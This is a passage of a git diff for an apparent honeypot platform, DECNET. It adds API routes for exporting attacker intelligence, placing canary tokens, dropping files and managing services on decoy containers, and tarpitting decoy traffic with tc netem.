== "message_stored" and _fields.get("stored_as"): + await repo.add_bounty({ + "decky": log_data.get("decky"), + "service": log_data.get("service"), + "attacker_ip": log_data.get("attacker_ip"), + "bounty_type": "artifact", + "payload": { + "kind": "mail", + "stored_as": _fields.get("stored_as"), + "sha256": _fields.get("sha256"), + "size": _fields.get("size"), + "subject": _fields.get("subject"), + "from_hdr": _fields.get("from_hdr"), + "to_hdr": _fields.get("to_hdr"), + "mail_from": _fields.get("mail_from"), + "rcpt_to": _fields.get("rcpt_to"), + "attachment_count": _fields.get("attachment_count"), + "content_type": _fields.get("content_type"), + }, + }) + # Signal the realism worker to forward this as a probe if it's the + # first message from this IP on an smtp_relay decky. The worker has + # real internet access (the container is on MACVLAN and doesn't). + if log_data.get("service") == "smtp_relay": + await _publish_probe_pending(log_data, _fields) + + +async def _publish_probe_pending(log_data: dict, fields: dict) -> None: + try: + bus = get_bus(client_name="ingester-probe") + await bus.connect() + await publish_safely( + bus, + _topics.smtp("probe.pending"), + { + "decky": log_data.get("decky"), + "attacker_ip": log_data.get("attacker_ip"), + "stored_as": fields.get("stored_as"), + "mail_from": fields.get("mail_from"), + "rcpt_to": fields.get("rcpt_to"), + }, + event_type="probe.pending", + ) + await bus.close() + except Exception as exc: # noqa: BLE001 + logger.debug("probe pending publish failed: %s", exc) + # ─── IP-leak detection (XFF / Forwarded / X-Real-IP / CDN variants) ────────── diff --git a/decnet/web/router/__init__.py b/decnet/web/router/__init__.py index e8ce8f63..c7138d27 100644 --- a/decnet/web/router/__init__.py +++ b/decnet/web/router/__init__.py @@ -14,6 +14,7 @@ from .fleet.api_mutate_interval import router as mutate_interval_router from .fleet.api_deploy_deckies import router as deploy_deckies_router from .stream.api_stream_events import router as stream_router from .attackers.api_get_attackers import router as attackers_router +from .attackers.api_export_attackers import router as attackers_export_router from .attackers.api_get_attacker_detail import router as attacker_detail_router from .attackers.api_get_attacker_commands import router as attacker_commands_router from .attackers.api_get_attacker_artifacts import router as attacker_artifacts_router @@ -50,6 +51,7 @@ from .swarm_mgmt import swarm_mgmt_router from .system import system_router from .topology import topology_router from .canary import canary_router +from .deckies import deckies_router from .webhooks import webhooks_router api_router = APIRouter( @@ -90,6 +92,7 @@ api_router.include_router(deploy_deckies_router) # Attacker Profiles api_router.include_router(attackers_router) +api_router.include_router(attackers_export_router) api_router.include_router(attacker_detail_router) api_router.include_router(attacker_commands_router) api_router.include_router(attacker_artifacts_router) @@ -156,6 +159,7 @@ api_router.include_router(topology_router) # Canary tokens — operator-facing CRUD (worker hosts the # attacker-facing surface separately via `decnet canary`). api_router.include_router(canary_router) +api_router.include_router(deckies_router) # External webhook subscriptions (SIEM/SOAR egress) api_router.include_router(webhooks_router) diff --git a/decnet/web/router/attackers/api_export_attackers.py b/decnet/web/router/attackers/api_export_attackers.py new file mode 100644 index 00000000..1e2778a4 --- /dev/null +++ b/decnet/web/router/attackers/api_export_attackers.py @@ -0,0 +1,96 @@ +"""GET /api/v1/attackers/export — bulk JSON export of all attacker + intel data.""" +import json +from datetime import datetime, timezone + +from fastapi import APIRouter, Depends +from fastapi.responses import Response + +from decnet.telemetry import traced as _traced +from decnet.web.dependencies import repo, require_viewer + +router = APIRouter() + +_SCHEMA_VERSION = "1.0" +_SOURCE = "DECNET Honeypot" + + +def _shape_observation(row: dict) -> dict: + intel = row.get("threat_intel") + return { + "uuid": row.get("uuid"), + "ip": row.get("ip"), + "first_seen": row.get("first_seen"), + "last_seen": row.get("last_seen"), + "identity_id": row.get("identity_id"), + "event_count": row.get("event_count", 0), + "service_count": row.get("service_count", 0), + "decky_count": row.get("decky_count", 0), + "services": row.get("services", []), + "deckies": row.get("deckies", []), + "traversal_path": row.get("traversal_path"), + "is_traversal": row.get("is_traversal", False), + "bounty_count": row.get("bounty_count", 0), + "credential_count": row.get("credential_count", 0), + "fingerprints": row.get("fingerprints", []), + "commands": row.get("commands", []), + "geoip": { + "country_code": row.get("country_code"), + "source": row.get("country_source"), + }, + "network": { + "asn": row.get("asn"), + "as_name": row.get("as_name"), + "ptr_record": row.get("ptr_record"), + }, + "threat_intel": { + "aggregate_verdict": intel.get("aggregate_verdict"), + "greynoise_classification": intel.get("greynoise_classification"), + "abuseipdb_score": intel.get("abuseipdb_score"), + "feodo_listed": intel.get("feodo_listed"), + "threatfox_listed": intel.get("threatfox_listed"), + "cached_at": intel.get("cached_at"), + } if intel else None, + } + + +@router.get( + "/attackers/export", + tags=["Attacker Profiles"], + responses={ + 200: {"content": {"application/json": {}}, "description": "JSON export download"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + }, +) +@_traced("api.export_attackers") +async def export_attackers( + user: dict = Depends(require_viewer), +) -> Response: + """Export all attacker observations and threat-intel as a single JSON file. + + Returns a downloadable JSON blob. Intel columns are null for attackers the + enrichment worker has not yet processed. + """ + rows = await repo.get_all_attackers_for_export() + observations = [_shape_observation(r) for r in rows] + def _dump(obj: object) -> str: + return json.dumps(obj, default=str, ensure_ascii=False, separators=(',', ':')) + + meta = _dump({ + "export_metadata": { + "source": _SOURCE, + "version": _SCHEMA_VERSION, + "exported_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), + "total_records": len(observations), + "schema_version": _SCHEMA_VERSION, + } + }) + obs_lines = ",\n".join(_dump(o) for o in observations) + content = f'{meta[:-1]},"observations":[\n{obs_lines}\n]}}' + ts = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ") + filename = f"decnet-export-{ts}.json" + return Response( + content=content, + media_type="application/json", + headers={"Content-Disposition": f'attachment; filename="{filename}"'}, + ) diff --git a/decnet/web/router/canary/api_tokens.py b/decnet/web/router/canary/api_tokens.py index 46ad723c..82043c93 100644 --- a/decnet/web/router/canary/api_tokens.py +++ b/decnet/web/router/canary/api_tokens.py @@ -61,6 +61,27 @@ def _row_to_response(row: dict[str, Any]) -> CanaryTokenResponse: return CanaryTokenResponse(**row) +async def _resolve_topology_target( + topology_id: str, decky_name: str, +) -> str: + """Validate (topology_id, decky_name) and return the docker container. + + Delegates to :func:`decnet.decky_io.resolve_decky_container` and + translates its ``LookupError`` into HTTP 404/422 — 404 when the + topology itself is missing, 422 when the named decky isn't in it. + """ + from decnet.decky_io import resolve_decky_container + try: + return await resolve_decky_container( + repo, decky_name, topology_id=topology_id, + ) + except LookupError as exc: + msg = str(exc) + if "topology" in msg and "not found" in msg: + raise HTTPException(status_code=404, detail=msg) from exc + raise HTTPException(status_code=422, detail=msg) from exc + + def _trigger_row_to_response(row: dict[str, Any]) -> CanaryTriggerResponse: # Decode raw_headers JSON for the response shape. headers = row.get("raw_headers") or "{}" @@ -105,6 +126,14 @@ async def api_create_token( except ValueError as e: raise HTTPException(status_code=400, detail=str(e)) from e + # Resolve the docker container before any expensive work — surfacing + # 404/422 here keeps a typo from minting a half-baked token row. + container: str | None = None + if req.topology_id: + container = await _resolve_topology_target( + req.topology_id, req.decky_name, + ) + slug = token_urlsafe(16) ctx = CanaryContext( callback_token=slug, http_base=_http_base(), dns_zone=_dns_zone(), @@ -147,6 +176,7 @@ async def api_create_token( "uuid": token_uuid, "kind": kind, "decky_name": req.decky_name, + "topology_id": req.topology_id, "blob_uuid": req.blob_uuid, "instrumenter": instrumenter_name, "generator": req.generator, @@ -156,7 +186,10 @@ async def api_create_token( "created_by": admin.get("uuid", "unknown"), "state": "planted", }) - await planter.plant(req.decky_name, artifact, token_uuid=token_uuid, repo=repo) + await planter.plant( + req.decky_name, artifact, + token_uuid=token_uuid, repo=repo, container=container, + ) row = await repo.get_canary_token(token_uuid) if row is None: raise HTTPException(status_code=500, detail="token insert succeeded but row not found") @@ -177,10 +210,12 @@ async def api_list_tokens( decky_name: str | None = Query(default=None), state: str | None = Query(default=None), kind: str | None = Query(default=None), + topology_id: str | None = Query(default=None), viewer: dict = Depends(require_viewer), ) -> CanaryTokensResponse: rows = await repo.list_canary_tokens( decky_name=decky_name, state=state, kind=kind, + topology_id=topology_id, ) return CanaryTokensResponse( tokens=[_row_to_response(r) for r in rows], @@ -315,8 +350,21 @@ async def api_revoke_token( row = await repo.get_canary_token(uuid) if row is None: raise HTTPException(status_code=404, detail="token not found") + # Re-resolve the container at revoke time: the topology may have + # been redeployed since placement. If it's gone entirely we fall + # through to the planter's fleet default — the call will fail + # best-effort and the row still flips to revoked. + container: str | None = None + topology_id = row.get("topology_id") + if topology_id: + try: + container = await _resolve_topology_target( + topology_id, row["decky_name"], + ) + except HTTPException: + container = None await planter.revoke( row["decky_name"], row["placement_path"], - token_uuid=uuid, repo=repo, + token_uuid=uuid, repo=repo, container=container, ) return MessageResponse(message="ok") diff --git a/decnet/web/router/deckies/__init__.py b/decnet/web/router/deckies/__init__.py new file mode 100644 index 00000000..c139dd2c --- /dev/null +++ b/decnet/web/router/deckies/__init__.py @@ -0,0 +1,33 @@ +"""Cross-cutting decky operation endpoints. + +These routes apply to both fleet and MazeNET (topology) deckies; the +MazeNET case is selected by passing ``topology_id`` in the request body. + +Compare with: + +* :mod:`decnet.web.router.fleet` — fleet-only CRUD (deploy, mutate, + list). +* :mod:`decnet.web.router.topology` — topology-only CRUD. +""" +from __future__ import annotations + +from fastapi import APIRouter + +from .api_file_drop import router as file_drop_router +from .api_services import ( + fleet_services_router, + topology_services_router, +) +from .api_tarpit import router as tarpit_router + +deckies_router = APIRouter() +deckies_router.include_router(file_drop_router) +deckies_router.include_router(fleet_services_router) +# Topology service routes live under /topologies/{id}/... — the prefix +# is set on the router itself. Mounted under the same `deckies_router` +# umbrella because the *operation* (add/remove a service on a deployed +# decky) is identical; only the addressing scheme differs. +deckies_router.include_router(topology_services_router) +deckies_router.include_router(tarpit_router) + +__all__ = ["deckies_router"] diff --git a/decnet/web/router/deckies/api_file_drop.py b/decnet/web/router/deckies/api_file_drop.py new file mode 100644 index 00000000..2f3bb003 --- /dev/null +++ b/decnet/web/router/deckies/api_file_drop.py @@ -0,0 +1,126 @@ +"""POST/DELETE /api/v1/deckies/files — generic file drops on deckies. + +Wraps :func:`decnet.decky_io.write_file_to_container` / +:func:`decnet.decky_io.delete_file_from_container` so admins can drop +arbitrary bytes at arbitrary paths inside a running decky container — +fleet OR MazeNET — without going through the canary surface. + +Auth: ``require_admin`` everywhere (matches every other write op on +deckies; see :mod:`decnet.web.router.fleet.api_mutate_decky`). + +Container resolution mirrors the canary path: ``topology_id`` absent +means fleet (``-ssh``), present routes through +:func:`decnet.decky_io.resolve_decky_container` for the MazeNET +``-ssh`` / ``decnet_t__`` distinction. +""" +from __future__ import annotations + +import base64 +from datetime import datetime, timedelta, timezone + +from fastapi import APIRouter, Depends, HTTPException + +from decnet.decky_io import ( + delete_file_from_container, + resolve_decky_container, + write_file_to_container, +) +from decnet.logging import get_logger +from decnet.web.db.models import ( + DeckyFileDeleteRequest, + DeckyFileDropRequest, + MessageResponse, +) +from decnet.web.dependencies import repo, require_admin + +log = get_logger("api.deckies.files") + +router = APIRouter(prefix="/deckies/files", tags=["Deckies"]) + + +async def _resolve_container_or_4xx( + decky_name: str, topology_id: str | None, +) -> str: + """Resolve to a docker container, mapping LookupError → 404/422.""" + try: + return await resolve_decky_container( + repo, decky_name, topology_id=topology_id, + ) + except LookupError as exc: + msg = str(exc) + if topology_id and "topology" in msg and "not found" in msg: + raise HTTPException(status_code=404, detail=msg) from exc + raise HTTPException(status_code=422, detail=msg) from exc + + +@router.post( + "", + response_model=MessageResponse, + status_code=201, + responses={ + 400: {"description": "Invalid request body (bad base64, etc.)"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology not found"}, + 409: {"description": "docker exec failed (container down or path unwritable)"}, + 422: {"description": "Path validation failed or decky not in topology"}, + }, +) +async def api_drop_file( + req: DeckyFileDropRequest, + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + content = base64.b64decode(req.content_b64, validate=True) + except (ValueError, TypeError) as exc: + raise HTTPException( + status_code=400, detail=f"content_b64 is not valid base64: {exc}", + ) from exc + + container = await _resolve_container_or_4xx(req.decky_name, req.topology_id) + mtime = ( + datetime.now(timezone.utc) + timedelta(seconds=req.mtime_offset) + if req.mtime_offset + else None + ) + success, error = await write_file_to_container( + container, req.path, content, mode=req.mode, mtime=mtime, + ) + if not success: + raise HTTPException(status_code=409, detail=error or "docker exec failed") + log.info( + "decky.file.drop decky=%s topology=%s container=%s path=%s bytes=%d by=%s", + req.decky_name, req.topology_id, container, req.path, + len(content), admin.get("uuid", "unknown"), + ) + return MessageResponse(message="ok") + + +@router.delete( + "", + response_model=MessageResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology not found"}, + 422: {"description": "Path validation failed or decky not in topology"}, + }, +) +async def api_delete_file( + req: DeckyFileDeleteRequest, + admin: dict = Depends(require_admin), +) -> MessageResponse: + container = await _resolve_container_or_4xx(req.decky_name, req.topology_id) + success, error = await delete_file_from_container(container, req.path) + # ``rm -f`` returns 0 even when the file is already gone, so a + # False here means the docker exec itself failed. Don't 404 — the + # caller asked us to ensure absence and we couldn't reach the + # container. Surface it as 409. + if not success: + raise HTTPException(status_code=409, detail=error or "docker exec failed") + log.info( + "decky.file.delete decky=%s topology=%s container=%s path=%s by=%s", + req.decky_name, req.topology_id, container, req.path, + admin.get("uuid", "unknown"), + ) + return MessageResponse(message="ok") diff --git a/decnet/web/router/deckies/api_services.py b/decnet/web/router/deckies/api_services.py new file mode 100644 index 00000000..9dd2640c --- /dev/null +++ b/decnet/web/router/deckies/api_services.py @@ -0,0 +1,313 @@ +"""POST/DELETE …/{decky}/services — live service add/remove. + +Two scopes mounted here: + +* fleet: ``/api/v1/deckies/{decky_name}/services`` +* topology: ``/api/v1/topologies/{topology_id}/deckies/{decky_name}/services`` + +Both return the post-mutation services list so the dashboard can +re-render without a follow-up GET. + +Auth: ``require_admin`` everywhere (matches every other write op on +deckies — see :mod:`decnet.web.router.fleet.api_mutate_decky`). +""" +from __future__ import annotations + +from fastapi import APIRouter, Depends, HTTPException, Path + +from decnet.engine.services_live import ( + ServiceConflictError, + ServiceMutationError, + ServiceNotFoundError, + add_service, + remove_service, + update_service_config, +) +from decnet.logging import get_logger +from decnet.services.base import ConfigValidationError +from decnet.web.db.models import ( + DeckyServiceAddRequest, + DeckyServiceConfigRequest, + DeckyServiceConfigResponse, + DeckyServicesResponse, +) +from decnet.web.dependencies import repo, require_admin + +log = get_logger("api.deckies.services") + + +fleet_services_router = APIRouter(tags=["Deckies"]) +topology_services_router = APIRouter(prefix="/topologies", tags=["Deckies"]) + + +def _map_mutation_error(exc: ServiceMutationError) -> HTTPException: + msg = str(exc) + if isinstance(exc, ServiceNotFoundError): + return HTTPException(status_code=404, detail=msg) + if isinstance(exc, ServiceConflictError): + return HTTPException(status_code=409, detail=msg) + return HTTPException(status_code=422, detail=msg) + + +# ---------------------------------------------------------- fleet + +@fleet_services_router.post( + "/deckies/{decky_name}/services", + status_code=201, + response_model=DeckyServicesResponse, + responses={ + 400: {"description": "Malformed request body or initial config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service already on decky"}, + 422: {"description": "Unknown or fleet_singleton service"}, + }, +) +async def api_fleet_add_service( + req: DeckyServiceAddRequest, + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await add_service( + repo, decky_kind="fleet", + decky_name=decky_name, service_name=req.name, + config=req.config, + ) + except ConfigValidationError as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse(decky_name=decky_name, services=services) + + +async def _do_update_config( + *, decky_kind, decky_name, service_name, cfg, apply, topology_id=None, +) -> DeckyServiceConfigResponse: + try: + validated = await update_service_config( + repo, + decky_kind=decky_kind, + decky_name=decky_name, + service_name=service_name, + cfg=cfg, + apply=apply, + topology_id=topology_id, + ) + except ConfigValidationError as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServiceConfigResponse( + decky_name=decky_name, + service_name=service_name, + topology_id=topology_id, + config=validated, + recreated=apply, + ) + + +@fleet_services_router.put( + "/deckies/{decky_name}/services/{service_name}/config", + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_fleet_put_service_config( + req: DeckyServiceConfigRequest, + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + """Persist new service_config (DB + compose); container untouched.""" + return await _do_update_config( + decky_kind="fleet", + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=False, + ) + + +@fleet_services_router.post( + "/deckies/{decky_name}/services/{service_name}/apply", + status_code=201, + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_fleet_apply_service_config( + req: DeckyServiceConfigRequest, + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + """Persist + force-recreate that one service container. Destructive.""" + return await _do_update_config( + decky_kind="fleet", + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=True, + ) + + +@fleet_services_router.delete( + "/deckies/{decky_name}/services/{service_name}", + response_model=DeckyServicesResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service not on decky"}, + }, +) +async def api_fleet_remove_service( + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await remove_service( + repo, decky_kind="fleet", + decky_name=decky_name, service_name=service_name, + ) + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse(decky_name=decky_name, services=services) + + +# ---------------------------------------------------------- topology + +@topology_services_router.post( + "/{topology_id}/deckies/{decky_name}/services", + status_code=201, + response_model=DeckyServicesResponse, + responses={ + 400: {"description": "Malformed request body or initial config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service already on decky"}, + 422: {"description": "Unknown or fleet_singleton service"}, + }, +) +async def api_topology_add_service( + req: DeckyServiceAddRequest, + topology_id: str = Path(...), + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await add_service( + repo, decky_kind="topology", topology_id=topology_id, + decky_name=decky_name, service_name=req.name, + config=req.config, + ) + except ConfigValidationError as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse( + decky_name=decky_name, topology_id=topology_id, services=services, + ) + + +@topology_services_router.put( + "/{topology_id}/deckies/{decky_name}/services/{service_name}/config", + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_topology_put_service_config( + req: DeckyServiceConfigRequest, + topology_id: str = Path(...), + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + return await _do_update_config( + decky_kind="topology", + topology_id=topology_id, + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=False, + ) + + +@topology_services_router.post( + "/{topology_id}/deckies/{decky_name}/services/{service_name}/apply", + status_code=201, + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_topology_apply_service_config( + req: DeckyServiceConfigRequest, + topology_id: str = Path(...), + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + return await _do_update_config( + decky_kind="topology", + topology_id=topology_id, + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=True, + ) + + +@topology_services_router.delete( + "/{topology_id}/deckies/{decky_name}/services/{service_name}", + response_model=DeckyServicesResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service not on decky"}, + }, +) +async def api_topology_remove_service( + topology_id: str = Path(...), + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await remove_service( + repo, decky_kind="topology", topology_id=topology_id, + decky_name=decky_name, service_name=service_name, + ) + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse( + decky_name=decky_name, topology_id=topology_id, services=services, + ) diff --git a/decnet/web/router/deckies/api_tarpit.py b/decnet/web/router/deckies/api_tarpit.py new file mode 100644 index 00000000..b3d76890 --- /dev/null +++ b/decnet/web/router/deckies/api_tarpit.py @@ -0,0 +1,229 @@ +"""POST/GET/DELETE /api/v1/deckies/{decky_name}/tarpit — per-decky tc netem tarpit. + +Applies port-selective traffic delay on the host veth paired to the target +decky container using tc qdisc (HTB + netem). Requires CAP_NET_ADMIN on +the API process (provided by decnet-api.service AmbientCapabilities). + +Auth: ``require_admin`` for write operations, ``require_viewer`` for GET. +""" +from __future__ import annotations + +import asyncio +import json +import socket +import subprocess # nosec B404 + +from fastapi import APIRouter, Depends, HTTPException, Path + +from decnet.logging import get_logger +from decnet.network import get_container_pid, get_container_veth +from decnet.web.db.models import ( + MessageResponse, + TarpitEnableRequest, + TarpitRuleResponse, + TarpitStatusResponse, +) +from decnet.web.dependencies import repo, require_admin, require_viewer + +log = get_logger("api.deckies.tarpit") + +router = APIRouter(prefix="/deckies/{decky_name}/tarpit", tags=["Deckies"]) + +_DECKY_RE = r"^[a-z0-9\-]{1,64}$" + + +def _tc(*args: str) -> subprocess.CompletedProcess[str]: + cmd = ["tc", *args] + return subprocess.run(cmd, capture_output=True, text=True) # nosec B603 B404 + + +def _apply_tarpit(veth: str, ports: list[int], delay_ms: int) -> None: + """Build tc qdisc + class + netem + per-port filters on veth.""" + steps = [ + ["qdisc", "add", "dev", veth, "root", "handle", "1:", "htb"], + ["class", "add", "dev", veth, "parent", "1:", "classid", "1:1", + "htb", "rate", "1gbit"], + ["qdisc", "add", "dev", veth, "parent", "1:1", "handle", "10:", + "netem", "delay", f"{delay_ms}ms"], + ] + for args in steps: + r = _tc(*args) + if r.returncode != 0: + raise RuntimeError(r.stderr.strip()) + + for port in ports: + r = _tc( + "filter", "add", "dev", veth, + "protocol", "ip", "parent", "1:", "prio", "1", + "u32", "match", "ip", "dport", str(port), "0xffff", + "flowid", "1:1", + ) + if r.returncode != 0: + raise RuntimeError(r.stderr.strip()) + + +def _remove_tarpit(veth: str) -> bool: + """Tear down the qdisc tree. Returns False if nothing was there.""" + r = _tc("qdisc", "del", "dev", veth, "root") + if r.returncode != 0: + if "Cannot find" in r.stderr or "No such" in r.stderr: + return False + raise RuntimeError(r.stderr.strip()) + return True + + +def _get_active_connections(pid: int, ports: list[int]) -> list[dict]: + """Read /proc/{pid}/net/tcp and return active connections on tarpitted ports.""" + try: + with open(f"/proc/{pid}/net/tcp") as f: + content = f.read() + except OSError: + return [] + + conns: list[dict] = [] + for line in content.strip().splitlines()[1:]: + parts = line.split() + if len(parts) < 4: + continue + local_hex, rem_hex, state = parts[1], parts[2], parts[3] + if state != "01": + continue + local_port = int(local_hex.split(":")[1], 16) + if local_port not in ports: + continue + rem_ip_hex = rem_hex.split(":")[0] + try: + ip = socket.inet_ntoa(bytes.fromhex(rem_ip_hex)[::-1]) + except (ValueError, OSError): + continue + if ip != "0.0.0.0": # nosec B104 + conns.append({"ip": ip, "port": local_port}) + return conns + + +@router.post( + "", + response_model=MessageResponse, + status_code=201, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found in active deployment"}, + 409: {"description": "tc command failed (qdisc already exists or veth unreachable)"}, + }, +) +async def api_enable_tarpit( + decky_name: str = Path(..., pattern=_DECKY_RE), + req: TarpitEnableRequest = ..., # type: ignore[assignment] + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + veth = await asyncio.to_thread(get_container_veth, decky_name) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_apply_tarpit, veth, req.ports, req.delay_ms) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + ports_json = json.dumps(req.ports) + await repo.set_tarpit_rule({ + "decky_name": decky_name, + "ports": ports_json, + "delay_ms": req.delay_ms, + "created_by": admin.get("uuid", "unknown"), + }) + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": "tarpit_enabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit enabled decky={decky_name} ports={req.ports} delay={req.delay_ms}ms" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({ + "ports": req.ports, + "delay_ms": req.delay_ms, + "veth": veth, + "operator": admin.get("uuid"), + }), + }) + log.info( + "tarpit enabled decky=%s ports=%s delay_ms=%d veth=%s by=%s", + decky_name, req.ports, req.delay_ms, veth, admin.get("uuid"), + ) + return MessageResponse(message="tarpit active") + + +@router.get( + "", + response_model=TarpitStatusResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "No active tarpit rule for this decky"}, + }, +) +async def api_get_tarpit( + decky_name: str = Path(..., pattern=_DECKY_RE), + viewer: dict = Depends(require_viewer), +) -> TarpitStatusResponse: + rule = await repo.get_tarpit_rule(decky_name) + if rule is None: + raise HTTPException(status_code=404, detail="No active tarpit rule for this decky") + + conns: list[dict] = [] + try: + pid = await asyncio.to_thread(get_container_pid, decky_name) + raw_conns = await asyncio.to_thread(_get_active_connections, pid, rule["ports"]) + for c in raw_conns: + conns.append({"ip": c["ip"], "port": c["port"]}) + except LookupError: + pass + + return TarpitStatusResponse( + rule=TarpitRuleResponse(**rule), + active_connections=conns, + ) + + +@router.delete( + "", + response_model=MessageResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky container not found"}, + 409: {"description": "tc teardown failed"}, + }, +) +async def api_disable_tarpit( + decky_name: str = Path(..., pattern=_DECKY_RE), + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + veth = await asyncio.to_thread(get_container_veth, decky_name) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_remove_tarpit, veth) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + await repo.delete_tarpit_rule(decky_name) + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": "tarpit_disabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit disabled decky={decky_name}" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({"veth": veth, "operator": admin.get("uuid")}), + }) + log.info("tarpit disabled decky=%s veth=%s by=%s", decky_name, veth, admin.get("uuid")) + return MessageResponse(message="tarpit removed") diff --git a/decnet/web/router/realism/api_config.py b/decnet/web/router/realism/api_config.py index 118acb77..214f4726 100644 --- a/decnet/web/router/realism/api_config.py +++ b/decnet/web/router/realism/api_config.py @@ -16,6 +16,7 @@ waiting for the orchestrator's next refresh tick. """ from __future__ import annotations +import asyncio import json from typing import Any @@ -30,6 +31,8 @@ router = APIRouter() log = get_logger("api.realism.config") _CONFIG_KEY = "weights" +_hydrated = False +_hydrate_lock = asyncio.Lock() @router.get( @@ -51,20 +54,22 @@ async def get_config( restart the ``realism_config`` row is loaded into this process the first time GET is called; subsequent reads are local. """ - # Lazy hydration — first call after restart pulls from DB so the - # admin sees what the orchestrator is actually using, not the - # baked-in defaults. - row = await repo.get_realism_config(_CONFIG_KEY) - if row is not None: - try: - stored = json.loads(row.get("value") or "{}") - if isinstance(stored, dict): - planner.apply_payload(stored) - except (json.JSONDecodeError, ValueError) as exc: - log.warning( - "api.realism.get_config: stored payload invalid, " - "serving defaults: %s", exc, - ) + global _hydrated + if not _hydrated: + async with _hydrate_lock: + if not _hydrated: + row = await 